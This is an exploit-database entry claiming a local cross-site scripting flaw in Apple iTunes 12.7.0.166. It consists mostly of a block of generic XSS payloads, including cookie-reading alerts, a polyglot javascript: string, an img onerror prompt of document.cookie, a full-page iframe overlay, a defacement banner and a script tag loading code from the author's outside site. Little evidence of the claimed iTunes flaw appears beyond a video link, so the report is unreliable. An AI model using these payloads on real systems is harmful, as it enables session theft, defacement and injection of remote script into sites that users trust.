Apple İtunes Xss Vulnerability

2018.03.11
tr TrazeR (TR) tr
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Apple İtunes 12.7.0.166 Xss Vulnerability Video: https://www.youtube.com/watch?v=d5zaiRWjidI ################################################################################# Payload: </textarea>''><script>alert(document.cookie)</script> <svg/onload=prompt(1)> fyuw9'><script>alert(1)</script>rzypgytzuf <marquee>http://www.trazer.org</marquee> "><marquee>: <p>&quot;&gt;&lt;h1&gt;aaa</p></div></li> jaVasCript:/*-/*/*\/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>">[img=1,name=/alert(1)/.source]<img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>" <iframe src="http://www.trazer.org" style="position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;"> </iframe> ></title><script>alert(KCF)</script>'"><marquee><h1>seytan61616161</h1></marquee> ">height=640&image=<br><center><img src="http://i.hizliresim.com/P0pOyv.jpg" width="1024" weight="768" ></center>/<html>Hacked by Sipahiler - Turkz Grup - turkz.org</html> "><img src=x onerror=prompt(document.cookie)>.png <script type="text/javascript" src="http://www.trazer.org/"></script> #################################################################################

References:

http://www.trazer.org


Vote for this issue:
75%
25%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top